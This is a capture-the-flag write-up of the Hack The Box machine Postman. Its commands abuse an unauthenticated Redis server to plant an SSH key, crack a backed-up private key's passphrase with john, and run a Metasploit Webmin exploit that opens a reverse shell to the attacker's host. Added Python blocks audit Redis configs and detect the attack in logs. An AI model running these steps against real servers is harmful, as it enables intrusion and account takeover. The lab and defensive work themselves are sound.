23rd November 2020
Hack The Box Write-Up Postman by T13nn3s

Hack The Box Write-Up Postman – 10.10.10.160

A hacker does for love what others would not do for money.

Laura Creighton

About Postman

In this post, I’m writing a write-up for the machine Postman from Hack The Box. Hack The Box is an online platform to train your ethical hacking and penetration testing skills.

Postman is an ‘easy’ rated box. Submitting the user.txt flag raises your points by 10, and submitting the root flag raises them by 20.

Machine Info

Machine info: machine IP and creator

Enumeration

Portscan (Nmap)

First, I start with a port scan with Nmap. My initial Nmap scan missed port 6379, so I scanned the target again with the port range 1-10000.

~$ nmap -p 1-10000 -sC -sV -oA ./nmap/postman.txt 10.10.10.160

The results:

Nmap scan report for 10.10.10.160
Host is up (0.033s latency).
Scanned at 2020-02-07 20:51:34 CET for 2957s
Not shown: 9965 closed ports
PORT      STATE    SERVICE        VERSION
22/tcp    open     ssh            OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
|   256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_  256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp    open     http           Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
6379/tcp  open     redis          Redis key-value store 4.0.9
10000/tcp open     http           MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
| ndmp-version: 
|_  ERROR: Failed to get host information from server
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read from /usr/bin/../share/nmap: nmap-payloads nmap-service-probes nmap-services.
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Feb  7 21:40:51 2020 -- 1 IP address (1 host up) scanned in 2958.40 seconds

Nmap reports the following open ports:

  • 22/tcp (SSH)
  • 80/tcp (HTTP Apache Web Server)
  • 6379/tcp (Redis 4.0.9)
  • 10000/tcp (HTTP MiniServ 1.910)

Enumeration Web Server

I start enumerating the web server by visiting the website on http://10.10.10.160. I landed on a good-looking web page from Cyber Geek, and it seems that I’m welcome.

The webpage on http://10.10.10.160

I looked through the website, but there are no usable pages. There is a username listed on the information bar at the bottom: [email protected]. With wfuzz I tried some wordlists and found some default folders, but nothing juicy. There is also a higher port open, so let’s check that one.

Enumeration Webmin

I visited the following web page: http://10.10.10.160:10000. There is a message that this site has to be visited over HTTPS, so I changed the protocol and visited https://10.10.10.160:10000/. And I have a login page.

Webmin on https://10.10.10.160:10000

There is nothing useful on this web page either. I need valid credentials to log in, but I don’t have any yet. On to the next port, 6379.

Enumerate Redis

As Redis 4.0.9 is installed on this box, it is vulnerable to unauthenticated code execution. I searched the internet for an exploit and came up with this page: https://packetstormsecurity.com/files/134200/Redis-Remote-Command-Execution.html. I invoked the command below:

~$ telnet 10.10.10.160 6379
Trying 10.10.10.160...
Connected to 10.10.10.160.
Escape character is '^]'.
echo "Hey no AUTH required!"
$21
Hey no AUTH required!
quit
+OK
Connection closed by foreign host.

This works; no authentication is needed. Redis is installed unprotected, without any password. Let’s exploit this vulnerability!

Exploit

Unauthenticated code execution

I can write files to this box without any authentication. Let’s create a new SSH key pair. I invoked the command below:

~$ ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): /home/htb/boxes/machines/postman/id_rsa
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /home/htb/boxes/machines/postman/id_rsa.
Your public key has been saved in /home/htb/boxes/machines/postman/id_rsa.pub.
The key fingerprint is:
SHA256:ZGnXXxEXku0kHb5YIhcPsW4xC3W+WuVNrYY5w28dVh0 [email protected]
The key's randomart image is:
+---[RSA 3072]----+
|             *=E=|
|         . ..oX+*|
|        = .o.*+=B|
|       + . .=+B**|
|        S   *=+*o|
|            .=+..|
|             .o .|
|             .   |
|                 |
+----[SHA256]-----+

I created this RSA key pair with no passphrase. Now I’ve got the key, and it needs to go into the memory of this box so that Redis writes it out when it saves its database. For that, the key has to survive inside the RDB dump: I copied id_rsa.pub to a text file and added "\n\n at the front and \n\n" at the end, so the key ends up on its own line surrounded by the RDB binary data. The contents of this file are shown below:

"\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcDCqfaDbp4EzyGlF3ekfopSKbq1aFbymf5H3cr6S442cvHpJ1LgSVAUUmFJXC6K6AjtQUgNm8PTljLEUp2vcTquNJo61eN3EpWJjj0SJujVohf
e/NCMosZ9t/ClKT+PN0rcRUMk6SyUAAP/ODHBbfIJxB2UPbNANDZSZzOYZ+5p4Uhyoti0qPdD8p7mQdfriCI4HqVBEgOYCoVTLYZcvTEVMV01abTc92opLsocAiwX/0OTpfyQRwhUO3kKEPEPzT3AcijW/0wcjrdtHMd4YylFmLanQTaVB1xdMKXoLczu3KqdJYr0Q4sI
6R81SvUcN718tkOeLfi+2e3tEa3XfmZxk7oGzj0s4KOYaKZ2DFhm0y8p85x0uAb9MKh3B8FeCpvwaAUzpSMGPCveqzhrM2b/XYba545ZycNfjGlkxW40QQHpT1no9Oqp7KqjvHK/3XYuiNzaZl1nsa+VSaSBk139pq+kfCf2kOjWMiMV/oW0fHjdE6ty9pA3y7t66JVBE
= [email protected]\n\n"

Now id_rsa.txt is just my public key wrapped in newlines. I copied the content of this file to my clipboard, opened a telnet session and invoked the commands below to load this key into memory.

~$ telnet 10.10.10.160 6379                             
Trying 10.10.10.160...
Connected to 10.10.10.160.
Escape character is '^]'.
set s-key "\n\nssh-rsa [...] [email protected]\n\n"
+OK
config set dir /var/lib/redis/.ssh                
+OK                                               
config set dbfilename authorized_keys             
+OK                                               
save                                              
+OK                                               
quit                                              
+OK                                               
Connection closed by foreign host.

Everything looks good. Now I try to open an SSH session to this box. If everything is configured properly, I get a session without entering any credentials.

~$ ssh -i ./id_rsa  [email protected]
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Fri Feb  7 22:04:13 2020 from 10.10.14.183
[email protected]:~$

I now have an SSH session on this box as the user redis!

[email protected]:~$ whoami
redis
[email protected]:~$ pwd
/var/lib/redis
[email protected]:~$
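The whole chain above depends on two server-side settings: Redis accepts connections without a password, and the CONFIG command is reachable, so a client can point dir and dbfilename at any path the redis user may write and force a SAVE. As an added example that is not part of the original write-up, the Python below audits a redis.conf for exactly those settings (a constructed weak config beside its hardened counterpart) and, from the defender's side, scans Redis MONITOR output for the dir/dbfilename/SAVE sequence. The config fragments and MONITOR lines are constructed for illustration, not the box's real files or traffic.

```python
"""Audit a redis.conf for the weaknesses this write-up abuses and flag the
CONFIG SET dir / CONFIG SET dbfilename / SAVE pattern in Redis MONITOR output.

Added example, not code from the write-up or from Redis. The config fragments
and MONITOR lines below are constructed for illustration.
"""
import re
import shlex

# Constructed redis.conf with the weaknesses the write-up relies on.
WEAK_CONF = """
bind 0.0.0.0
protected-mode no
port 6379
# requirepass is left commented out, so no AUTH is needed
dir /var/lib/redis
"""

# Constructed hardened counterpart: loopback bind, password, CONFIG disabled.
HARDENED_CONF = """
bind 127.0.0.1
protected-mode yes
port 6379
requirepass 9f2c6e7a3b1d4f8e0a5c7b9d1e3f5a7c
rename-command CONFIG ""
dir /var/lib/redis
"""


def parse_conf(text):
    """Yield (directive, args) pairs, skipping blank lines and comments."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = shlex.split(line)  # shlex keeps the "" in: rename-command CONFIG ""
        yield parts[0].lower(), parts[1:]


def audit_redis_conf(text):
    """Return a list of findings; an empty list means every check passed."""
    directives, renamed = {}, {}
    for name, args in parse_conf(text):
        if name == "rename-command" and len(args) == 2:
            renamed[args[0].upper()] = args[1]
        else:
            directives.setdefault(name, []).append(args)

    findings = []
    if not any(args and args[0] for args in directives.get("requirepass", [])):
        findings.append("no requirepass: anyone who reaches the port has full access")
    mode = directives.get("protected-mode", [["yes"]])[0]
    if mode and mode[0].lower() == "no":
        findings.append("protected-mode no: remote clients accepted without a password")
    binds = [addr for args in directives.get("bind", []) for addr in args]
    if not binds or any(b in ("0.0.0.0", "::", "*") for b in binds):
        findings.append("bind: listening on every interface")
    if renamed.get("CONFIG") != "":
        findings.append("CONFIG reachable: clients can move the RDB dump via dir/dbfilename")
    return findings


# Constructed MONITOR lines in Redis' own format: <ts> [<db> <addr:port>] "cmd" "arg" ...
MONITOR_LOG = """\
1581106541.118 [0 10.10.14.183:53612] "echo" "Hey no AUTH required!"
1581106602.553 [0 10.10.14.183:53618] "set" "s-key" "ssh-rsa AAAA...CONSTRUCTED"
1581106610.004 [0 10.10.14.183:53618] "config" "set" "dir" "/var/lib/redis/.ssh"
1581106615.271 [0 10.10.14.183:53618] "config" "set" "dbfilename" "authorized_keys"
1581106620.900 [0 10.10.14.183:53618] "save"
1581106700.000 [0 127.0.0.1:40001] "get" "session:42"
"""

MONITOR_RE = re.compile(r"^(\S+) \[(\d+) ([^\]]+)\] (.*)$")


def detect_dump_redirects(log_text):
    """Return (client, dir, dbfilename) for each client that redirected the RDB
    dump and then forced a SAVE/BGSAVE, i.e. wrote a file to a path of its choice."""
    pending, hits = {}, []
    for line in log_text.splitlines():
        m = MONITOR_RE.match(line)
        if not m:
            continue
        client, argv = m.group(3), shlex.split(m.group(4))
        cmd = [a.lower() for a in argv[:3]]
        if cmd[:2] == ["config", "set"] and len(argv) == 4 and cmd[2] in ("dir", "dbfilename"):
            pending.setdefault(client, {})[cmd[2]] = argv[3]
        elif cmd[:1] in (["save"], ["bgsave"]) and len(pending.get(client, {})) == 2:
            hits.append((client, pending[client]["dir"], pending[client]["dbfilename"]))
            del pending[client]
    return hits


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, audit_redis_conf(conf) or ["no findings"])
    print(detect_dump_redirects(MONITOR_LOG))
```

Run as-is it reports four findings for the weak config and none for the hardened one, and one redirected dump for the client at 10.10.14.183:53618. requirepass and a loopback bind stop the unauthenticated write; rename-command CONFIG "" removes the file-write primitive even if the password leaks. protected-mode only protects an instance that has neither bind nor requirepass configured, which is why the audit checks all three rather than relying on it.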

Enumeration on user

I have an active session on this box. Let’s poke around and check whether I can find user.txt. There is a home folder for the user Matt, but it seems that the user redis does not have permission to open user.txt.

[email protected]:~$ cd /home/
[email protected]:/home$ ls
Matt
[email protected]:/home$ cd Matt/
[email protected]:/home/Matt$ ls
user.txt
[email protected]:/home/Matt$ cat user.txt 
cat: user.txt: Permission denied
[email protected]:/home/Matt$

It took me some hours of searching and poking around. It was driving me insane that I couldn’t find anything useful. After a little walk outside, I decided to put my knowledge from previous boxes to the test and use grep to search for useful files. As grep was not working for me on this machine, I tried the find command. After some searching, I couldn’t believe my eyes: I had found a backup of a private key!

[email protected]:/$ find . -name "id_rsa*" -print -quit
./opt/id_rsa.bak

This has to be the private key of the user Matt!

[email protected]:/opt$ cat id_rsa.bak 
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C

[...]
-----END RSA PRIVATE KEY-----

I copied the content to the file ‘id_rsa.bak’ on my Kali machine and gave it to ssh2john:

~# python ssh2john.py id_rsa.bak 
id_rsa.bak:$sshng$0$8$73E9CEFBCCF5287C$1192$25e840e75235eebb0238e56ac96c7e0bcdfadc8381617435d43770fe9af72f6036343b41eedbec5cdcaa2838217d09d77301892540fd90a267889909cebbc5d567a9bcc3648fd648b5743360df306e396b92ed5b26ae719c95fd1146f923b936ec6b13c2c32f2b35e491f11941a5cafd3e74b3723809d71f6ebd5d5c8c9a6d72cba593a26442afaf8f8ac928e9e28bba71d9c25a1ce403f4f02695c6d5678e98cbed0995b51c206eb58b0d3fa0437fbf1b4069a6962aea4665df2c1f762614fdd6ef09cc7089d7364c1b9bda52dbe89f4aa03f1ef178850ee8b0054e8ceb37d306584a81109e73315aebb774c656472f132be55b092ced1fe08f11f25304fe6b92c21864a3543f392f162eb605b139429bb561816d4f328bb62c5e5282c301cf507ece7d0cf4dd55b2f8ad1a6bc42cf84cb0e97df06d69ee7b4de783fb0b26727bdbdcdbde4bb29bcafe854fbdbfa5584a3f909e35536230df9d3db68c90541d3576cab29e033e825dd153fb1221c44022bf49b56649324245a95220b3cae60ab7e312b705ad4add1527853535ad86df118f8e6ae49a3c17bee74a0b460dfce0683cf393681543f62e9fb2867aa709d2e4c8bc073ac185d3b4c0768371360f737074d02c2a015e4c5e6900936cca2f45b6b5d55892c2b0c4a0b01a65a5a5d91e3f6246969f4b5847ab31fa256e34d2394e660de3df310ddfc023ba30f062ab3aeb15c3cd26beff31c40409be6c7fe3ba8ca13725f9f45151364157552b7a042fa0f26817ff5b677fdd3eead7451decafb829ddfa8313017f7dc46bafaac7719e49b248864b30e532a1779d39022507d939fcf6a34679c54911b8ca789fef1590b9608b10fbdb25f3d4e62472fbe18de29776170c4b108e1647c57e57fd1534d83f80174ee9dc14918e10f7d1c8e3d2eb9690aa30a68a3463479b96099dee8d97d15216aec90f2b823b207e606e4af15466fff60fd6dae6b50b736772fdcc35c7f49e5235d7b052fd0c0db6e4e8cc6f294bd937962fab62be9fde66bf50bb149ca89996cf12a54f91b1aa2c2c6299ea9da821ef284529a5382b18d080aaede451864bb352e1fdcff981a36b505a1f2abd3a024848e0f3234ef73f3e2dda0dd7041630f695c11063232c423c7153277bbe671cb4b483f08c266fc547d89ff2b81551dabef03e6fd968a67502100111a7022ff3eb58a1fc065692d50b40eb379f155d37c1d97f6c2f5a01de13b8989174677c89d8a644758c071aea8d4c56a0374801732348db0b3164dcc82b6eaf3eb3836fa05cf5476258266a30a531e1a3132e11b944e8e0406cad59ffeaecc1ab3b7705db99353c458dc9932a638598b195e25a14051e414e20dc1510eb476a467f4e861a
51036d453ea96721e0be34f4993a34b778d4111b29a63d69c1b8200869a129392684af8c4daa32f3d0a0d17c36275f039b4a3bf29e9436b912b9ed42b168c47c4205dcd00c114da8f8d82af761e69e900545eb6fc10ef1ba4934adb6fa9af17c812a8b420ed6a5b645cad812d394e93d93ccd21f2d444f1845d261796ad055c372647f0e1d8a844b8836505eb62a9b6da92c0b8a2178bad1eafbf879090c2c17e25183cf1b9f1876cf6043ea2e565fe84ae473e9a7a4278d9f00e4446e50419a641114bc626d3c61e36722e9932b4c8538da3ab44d63

I placed this hash in ‘ssh_password.txt’ and let john crack the passphrase:

~# john ssh_pssword.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
computer2008     (id_rsa.bak)

That’s an easy password. Let’s try to connect with SSH as Matt. It turns out that Matt is not permitted to log in over SSH. After all those hours of work this was a hard disappointment, and I had to get myself back under control, with a cup of coffee, before I could go on.
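The john output shows why the passphrase fell so quickly: the backup is a legacy PEM key (Proc-Type: 4,ENCRYPTED, DES-EDE3-CBC), whose passphrase is turned into a key by a fast MD5-based derivation, so every rockyou candidate costs about one hash. Keys in the newer OpenSSH format use bcrypt with a configurable round count (ssh-keygen -p -o -a 100 -f <key> rewrites an existing key that way), and a backup in /opt that another account can read should not exist at all. The following is an added example, not code from the write-up: it classifies a private key file by format, cipher and KDF and flags copies that group or other can read. The key texts are constructed (the legacy one has the same header style as id_rsa.bak with a dummy body; the new-format one is built by build_openssh_v1_header() with no key material), so neither is a usable key; only header fields are parsed.

```python
"""Classify an SSH private key by its on-disk format and the strength of the
passphrase KDF, and flag keys that group or other can read.

Added example, not code from the write-up. LEGACY_ENCRYPTED and the output of
build_openssh_v1_header() are constructed headers without key material.
"""
import base64
import os
import stat
import struct

OPENSSH_MAGIC = b"openssh-key-v1\x00"


def _read_string(blob, offset):
    """Read one SSH wire-format string (uint32 length prefix + bytes)."""
    (length,) = struct.unpack_from(">I", blob, offset)
    start = offset + 4
    return blob[start:start + length], start + length


def _ssh_string(data):
    return struct.pack(">I", len(data)) + data


def build_openssh_v1_header(cipher, kdf, rounds):
    """Construct only the leading fields of an openssh-key-v1 blob (for testing)."""
    kdfopts = b""
    if kdf == b"bcrypt":
        kdfopts = _ssh_string(b"\x00" * 16) + struct.pack(">I", rounds)  # salt, rounds
    blob = OPENSSH_MAGIC + _ssh_string(cipher) + _ssh_string(kdf) + _ssh_string(kdfopts)
    return ("-----BEGIN OPENSSH PRIVATE KEY-----\n"
            + base64.b64encode(blob).decode()
            + "\n-----END OPENSSH PRIVATE KEY-----\n")


# Constructed: same header style as id_rsa.bak, dummy base64 body, not a real key.
LEGACY_ENCRYPTED = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,0011223344556677

QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo=
-----END RSA PRIVATE KEY-----
"""


def classify_key(text):
    """Return format, cipher, KDF, bcrypt rounds and a risk note for one key."""
    lines = [ln.strip() for ln in text.strip().splitlines()]
    first = lines[0]
    if first == "-----BEGIN OPENSSH PRIVATE KEY-----":
        blob = base64.b64decode("".join(lines[1:-1]))
        if not blob.startswith(OPENSSH_MAGIC):
            raise ValueError("bad openssh-key-v1 magic")
        cipher, off = _read_string(blob, len(OPENSSH_MAGIC))
        kdf, off = _read_string(blob, off)
        kdfopts, off = _read_string(blob, off)
        rounds = None
        if kdf == b"bcrypt":
            _salt, o = _read_string(kdfopts, 0)
            (rounds,) = struct.unpack_from(">I", kdfopts, o)
        encrypted = cipher != b"none"
        return {"format": "openssh-v1", "encrypted": encrypted, "cipher": cipher.decode(),
                "kdf": kdf.decode(), "rounds": rounds,
                "risk": "ok" if encrypted else "unencrypted private key"}
    if first == "-----BEGIN ENCRYPTED PRIVATE KEY-----":
        return {"format": "pkcs8", "encrypted": True, "cipher": "see PKCS#8 parameters",
                "kdf": "not parsed (PBES1/PBES2)", "rounds": None, "risk": "ok"}
    if first.startswith("-----BEGIN ") and first.endswith(" PRIVATE KEY-----"):
        # Legacy PEM: optional Proc-Type / DEK-Info headers before the base64 body.
        headers = dict(ln.split(": ", 1) for ln in lines[1:-1] if ": " in ln)
        encrypted = headers.get("Proc-Type") == "4,ENCRYPTED"
        cipher = headers.get("DEK-Info", "none").split(",", 1)[0]
        return {"format": "legacy-pem", "encrypted": encrypted, "cipher": cipher,
                "kdf": "md5 (EVP_BytesToKey)" if encrypted else None, "rounds": None,
                "risk": ("legacy PEM: fast MD5-based KDF, wordlist attacks run at "
                         "hash speed") if encrypted else "unencrypted private key"}
    raise ValueError("not a PEM-encoded private key")


def check_key_file(path):
    """Classify a key on disk and note whether group or other can read it."""
    with open(path) as fh:
        info = classify_key(fh.read())
    mode = os.stat(path).st_mode
    info["world_readable"] = bool(mode & (stat.S_IRGRP | stat.S_IROTH))
    return info


if __name__ == "__main__":
    print(classify_key(LEGACY_ENCRYPTED))
    print(classify_key(build_openssh_v1_header(b"aes256-ctr", b"bcrypt", 100)))
```

check_key_file() is what you would point at a backup directory during a review; anything that comes back as legacy-pem with encrypted set, or with world_readable true, is a key that a wordlist attack or a low-privileged neighbour can turn into an account, exactly as happened here.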

Get user.txt

I logged back in as redis. Maybe I can switch to Matt with the su Matt command. It works: I can switch accounts and grab the user flag!

sudo: unable to initialize policy plugin
[email protected]:~$ su Matt
Password: 
[email protected]:/var/lib/redis$ cat /home/Matt/user.txt 
517ad0ec2458ca97af8d93aac08a2f3c
[email protected]:/var/lib/redis$

It’s still very exciting to grab the user flag.

Exploit

Exploit Webmin (Metasploit)

Now on to root! I feel like there’s been a horse in the living room for hours, and we haven’t done anything about it… The name of the horse: Webmin. I went back to the Webmin portal on https://10.10.10.160:10000 and logged in as Matt.

Matt has access to the Software Package Updates

Matt has access to the Software Package Updates module, and I found an article on the internet about a vulnerability in it (https://www.exploit-db.com/exploits/46984). There is a Metasploit module available to exploit this vulnerability. I started msfconsole, exploited Webmin and grabbed the root.txt flag.

msf5 > use exploit/linux/http/web
use exploit/linux/http/webcalendar_settings_exec  use exploit/linux/http/webid_converter  use exploit/linux/http/webmin_backdoor  use exploit/linux/http/webmin_packageup_rce
msf5 > use exploit/linux/http/webmin_packageup_rce
msf5 exploit(linux/http/webmin_packageup_rce) > set rhosts 10.10.10.160
rhosts => 10.10.10.160
msf5 exploit(linux/http/webmin_packageup_rce) > set username Matt
username => Matt
msf5 exploit(linux/http/webmin_packageup_rce) > set password computer2008
password => computer2008
msf5 exploit(linux/http/webmin_packageup_rce) > set ssl true
ssl => true
msf5 exploit(linux/http/webmin_packageup_rce) > set lhost 10.10.15.62
lhost => 10.10.15.62
msf5 exploit(linux/http/webmin_packageup_rce) > exploit

[*] Started reverse TCP handler on 10.10.15.62:4444
[+] Session cookie: af1882183da1a304a49faf5183463233
[*] Attempting to execute the payload...
[*] Command shell session 1 opened (10.10.15.62:4444 -> 10.10.10.160:41504) at 2020-02-08 00:23:06 +0100
shell
[*] Trying to find binary(python) on target machine
[*] Found python at
[*] Using `python` to pop up an interactive shell
cat /root/root.txt
a257741c5bed8be7778c6ed95686ddce

Rooted this box. I have to say that this is the easiest privilege escalation I have ever done on Hack The Box. Did you like this write-up? Please consider spending some respect points. My profile: https://www.hackthebox.eu/profile/224856. Many thanks in advance!

As always: Happy Hacking!

T13nn3s

I'm a cybersecurity enthusiast! I'm working as an IT Security Engineer for a company in The Netherlands. I love writing scripts and doing research and pentesting. As a big fan of Hack The Box, I share my write-ups on this blog. I'm blogging because I like to summarize my thoughts and share them with you.
